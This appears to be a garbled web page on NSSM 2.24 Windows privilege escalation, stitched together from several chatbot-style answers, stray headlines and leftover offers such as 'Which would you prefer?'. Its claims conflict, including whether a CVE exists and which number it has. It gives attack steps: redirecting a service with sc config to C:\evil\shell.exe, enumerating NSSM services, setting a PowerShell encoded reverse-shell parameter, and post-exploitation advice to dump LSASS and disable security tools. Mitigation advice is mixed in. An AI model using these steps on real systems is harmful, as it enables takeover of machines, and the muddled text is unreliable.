Nssm-2.24 Privilege Escalation «RECENT × Walkthrough»

Assumptions:

Steps to escalate:

# As standard user bob
sc qc vuln_svc
:: Output shows SERVICE_CHANGE_CONFIG permission present.

sc config vuln_svc binPath= "C:\evil\shell.exe"
sc stop vuln_svc
sc start vuln_svc

shell.exe runs as SYSTEM.

An authenticated, low-privileged user can achieve full SYSTEM privileges on the affected host. This compromises integrity, confidentiality, and availability.

# Find NSSM services
Get-WmiObject win32_service | Where-Object $_.PathName -like "*nssm*" | Format-Table Name, StartName, PathName

Newer versions of NSSM (2.24 is the last stable release as of 2016; no official updates after) do not address these privilege escalation vectors. However, the problem is less about a bug in NSSM and more about administrative practices combined with NSSM’s lack of built-in security hardening. Attackers target version 2.24 because:



  • 

    Registry ACL Hardening
    
Restrict write access to the service parameters registry key for non-admin users:
    

    regini.exe nssm_acl.txt

    

    (Where nssm_acl.txt contains the hardened permissions.)
    

    • 

  • 

    Application Control
    
Use AppLocker or WDAC to block older versions of NSSM (hash-based rule for version 2.24).
    

    • 

  • 

    Service Permission Review
    
Audit all services with sc sdshow <ServiceName>. Ensure that INTERACTIVE or BUILTIN\Users does not have RPWP (start/write) permissions.
    

    • 

  • 

    Monitoring
    
Create a SIEM alert for:
    


    • 


    

    

    NSSM (Non-Sucking Service Manager) version 2.24 is susceptible to a privilege escalation vulnerability specifically related to its service configuration and the lack of quote marks in service binary paths.
    

    While "Write" is not a specific named feature within the tool itself, the vulnerability typically involves an attacker gaining write access to a directory where a service is installed or leveraging weak permissions on the NSSM executable itself to redirect service execution to a malicious payload. Privilege Escalation Mechanism
    

    The primary method for escalating privileges via NSSM 2.24 involves unquoted service paths. If an administrator installs a service using NSSM and the path to the executable contains spaces but no quotation marks (e.g., C:\Program Files\Service Name\nssm.exe), Windows will search for and attempt to execute files in the following order: C:\Program.exe C:\Program Files\Service.exe C:\Program Files\Service Name\nssm.exe
    

    If a low-privileged user has write permissions to C:\, they can place a malicious Program.exe there. When the system restarts or the service is triggered, it will run the malicious file with SYSTEM privileges. Vulnerability Breakdown
    

    Arbitrary File Write/Overwrite: Attackers look for instances where NSSM has been configured with weak file permissions. If a user can overwrite nssm.exe or its configuration in the Registry (located at HKLM\System\CurrentControlSet\Services\\Parameters), they can point the service to a malicious script.
    

    Registry Modification: NSSM stores its service parameters in the Registry. If the permissions on these Registry keys are too loose, a user can modify the AppParameters or Application string to execute a different command when the service starts.
    

    Version Specifics: Version 2.24 is the most widely cited version in security advisories because it was the stable release for a long period during which these configuration-based exploits were popularized in penetration testing frameworks. Mitigation Strategies nssm-2.24 privilege escalation
    

    To prevent privilege escalation when using NSSM, you should follow these security best practices:
    

    Quote Service Paths: Always ensure the path to nssm.exe and the application it manages are enclosed in double quotes within the service configuration.
    

    Restrict Permissions: Ensure that only administrators have "Write" or "Modify" permissions on the directory where nssm.exe is located and the Registry keys associated with the service.
    

    Update to Latest: While NSSM development is infrequent, ensure you are using the most stable version and auditing the service creation process for common Windows misconfigurations.
    

    Non-Sucking Service Manager (NSSM) version 2.24 does not have a unique, built-in "exploit" or CVE inherent to its code. Instead, privilege escalation involving NSSM almost always stems from insecure deployment configurations
    

    . Because NSSM is an executable used to wrap other applications as services, it is a high-value target for attackers who have already gained a foothold on a system. Primary Escalation Vectors
    

    When NSSM 2.24 is present, it is usually targeted via three common Windows service misconfigurations: Head Mare and Twelve: Joint attacks on Russian entities
    

    The Non-Sucking Service Manager (NSSM) 2.24 is a popular tool for running any application as a Windows service. While the tool itself is not inherently malicious, it is frequently exploited for Local Privilege Escalation (LPE) due to misconfigurations or unquoted service paths. Core Vulnerability: Unquoted Service Paths
    

    The most common privilege escalation involving NSSM 2.24 stems from "Unquoted Service Paths".
    

    The Flaw: If a service path contains spaces (e.g., C:\Program Files\NSSM\nssm.exe) and is not enclosed in double quotes, Windows will look for executables at every break.
    

    The Attack: An attacker can place a malicious program.exe in C:\ or nssm.exe in C:\Program Files\. When the service restarts, Windows may execute the attacker's file instead of the intended one, granting SYSTEM privileges. Exploitation in the Wild
    

    NSSM is a "dual-use" tool often leveraged by advanced threat groups for persistence and elevated access:
    

    Akira Ransomware: Used nssm-2.24 to create malicious services (like sysmon) to launch tunneling tools like Ngrok.
    

    Head Mare & Twelve: Used NSSM to make traffic tunneling tools (e.g., Localtonet) persistent on compromised business automation servers.
    

    Pelco VideoXpert: A known advisory (ZSL-2017-5418) highlighted how NSSM 2.24 in this software suite allowed non-privileged users to execute arbitrary code by replacing binaries in writable paths. Key Technical Details Vulnerable Version NSSM 2.24 (often bundled with third-party software) Common Path
    

    C:\ProgramData\... or C:\Program Files\... with weak permissions Impact Full system takeover (Vertical Privilege Escalation) Detection EDR alerts for nssm.exe in unusual paths like \Windows\tmp\ Prevention & Mitigation
    

    Quote Service Paths: Ensure all service binary paths are wrapped in double quotes.
    

    Strict Permissions: Restrict write access for standard users on directories containing service executables. Assumptions:
    

    Audit Services: Use sc qc [ServiceName] to check for unquoted paths or insecure binary locations.
    

    If you'd like to see a sample Proof of Concept (PoC) script for detecting these vulnerabilities or need a remediation guide for a specific environment, let me know! Head Mare and Twelve: Joint attacks on Russian entities
    

      For NSSM 2.24, a critical feature to address privilege escalation vulnerabilities is a Permission Integrity Check & Lockdown module.
    

    This feature focuses on mitigating the primary way attackers exploit NSSM: replacing the nssm.exe binary or its associated application executable due to insecure file permissions. Key Components of the "Secure Lockdown" Feature
    

    Automated Permission Audit: Upon service installation or startup, NSSM should scan its own binary path and the target application path. It would flag if high-risk groups (e.g., "Everyone," "Users," or "Authenticated Users") have Write or Full Control permissions.
    

    Mandatory Quoted Paths: The tool should automatically enforce quoted service paths in the Windows registry to prevent "Unquoted Service Path" exploits, where Windows might execute a malicious binary with a similar name in a parent folder.
    

    Binary Hash Verification: A feature that allows administrators to register a SHA-256 hash of the legitimate application executable. NSSM would verify this hash before every launch; if the binary has been replaced (a common privilege escalation tactic), NSSM would refuse to start the service.
    

    "Least Privilege" Mode: A toggle to ensure the service defaults to a virtual account or a low-privileged user instead of the "LocalSystem" account, which is the most frequent target for attackers looking for administrative control. Why this is needed
    

    NSSM 2.24 is frequently cited in security advisories because third-party installers (like CouchDB or Wowza Streaming Engine) often deploy it with weak directory permissions. Because NSSM typically runs with SYSTEM privileges, any user who can replace the nssm.exe file can effectively take over the entire machine.
    

    I can provide PowerShell scripts to manually audit your current NSSM services or help you harden the registry keys for an existing setup. Which would you prefer?       CVE-2016-20033 Detail - NVD
    

    NSSM version 2.24 is vulnerable to local privilege escalation when installed with insecure file permissions, allowing low-privileged users to replace the executable and run malicious code as SYSTEM. The vulnerability stems from Weak Service Permissions where attackers modify the service binary path, requiring remediation via strict Access Control List (ACL) configuration on the executable directories. For more information, visit the official nssm.cc documentation.
    

    The "Non-Sucking Service Manager" (NSSM) version 2.24 is frequently featured in cybersecurity "stories" or labs because it is a textbook example of how a helpful administrative tool can be turned into a vehicle for Local Privilege Escalation (LPE) on Windows systems. The Core Vulnerability
    

    NSSM itself is not inherently "malicious," but it is often misconfigured by software installers, leading to two common privilege escalation paths: Weak File Permissions (CVE-2016-8742):
    

    The Scenario: A program (like Apache CouchDB) installs NSSM 2.24 into a directory where regular users have "Write" or "Modify" permissions.
    

    The "Story": An attacker with low-level access replaces the nssm.exe binary with a malicious file (e.g., a reverse shell). Because NSSM usually runs as the LocalSystem account, the next time the service restarts, the attacker's code executes with full administrative power. Unquoted Service Paths:
    

    The Scenario: NSSM is registered as a service with a path like C:\Program Files\My App\nssm.exe but without quotation marks.
    

    The "Story": Windows interprets the space in "Program Files" as a potential break. If an attacker can place a file named Program.exe in the C:\ root, Windows will execute it instead of the intended NSSM binary during the next boot, granting the attacker SYSTEM privileges. Why NSSM 2.24 specifically?
    

    Widespread Legacy Use: Version 2.24 was released in 2014 and remains the standard "stable" version bundled with many older applications. Steps to escalate: # As standard user bob
    

    Common in CTFs: Due to its known behavior and role in historical vulnerabilities (like the Odoo or CouchDB exploits), it is a favorite for Capture The Flag (CTF) challenges and penetration testing certifications.
    

    Known Bugs: Official documentation for 2.24 notes that it may fail or loop if run without sufficient rights, ironically highlighting its deep integration with system privileges. Mitigation Strategies
    

    To prevent these scenarios, security professionals recommend:
    

    Principle of Least Privilege: Ensure the directory containing nssm.exe is only writable by Administrators or the TrustedInstaller.
    

    Quote Your Paths: Always wrap service paths in double quotes to prevent unquoted path attacks.
    

    Regular Audits: Use tools like icacls to verify that the "Users" group does not have "Full Control" over service binaries.
    

    If you'd like, I can provide a step-by-step technical walk-through of a specific exploit or help you check your own system for these misconfigurations. Which would you prefer? Bugs - NSSM - the Non-Sucking Service Manager
    

    

    Assume an attacker has gained initial access to a Windows 10 or Windows Server 2016 machine as a low-privileged user (e.g., via a phishing email or a vulnerable web app).
    

    Step 1: Reconnaissance
    
The attacker runs:
    

    where nssm

    

    Or checks installed versions:
    

    nssm version

    

    If the output says 2.24, the system is vulnerable.
    

    Step 2: Enumerate Existing NSSM Services
    

    wmic service where "pathname like '%nssm%'" get name, pathname

    

    Or check the registry directly:
    

    reg query HKLM\SYSTEM\CurrentControlSet\Services /s /f "ImagePath" | findstr /i "nssm"

    

    Step 3: Modify an Existing Service (Sneaky Method)
    
If a service named LegacyApp exists and is managed by NSSM 2.24, the attacker can simply modify its parameters without needing admin rights (due to the broken ACL or design flaw in that version):
    

    nssm set LegacyApp AppParameters "C:\Windows\System32\cmd.exe /c powershell -enc <base64 reverse shell>"

    

    Step 4: Trigger Execution
    


    Step 5: Post-Exploitation
    
The payload runs as SYSTEM. The attacker now has a high-integrity shell, can dump LSASS for credentials, move laterally, or disable security tools.
    

    

    type C:\ProgramData\poc.txt

    On a vulnerable system, this file will be created by SYSTEM. On a patched system, NSSM will reject the change due to validation errors.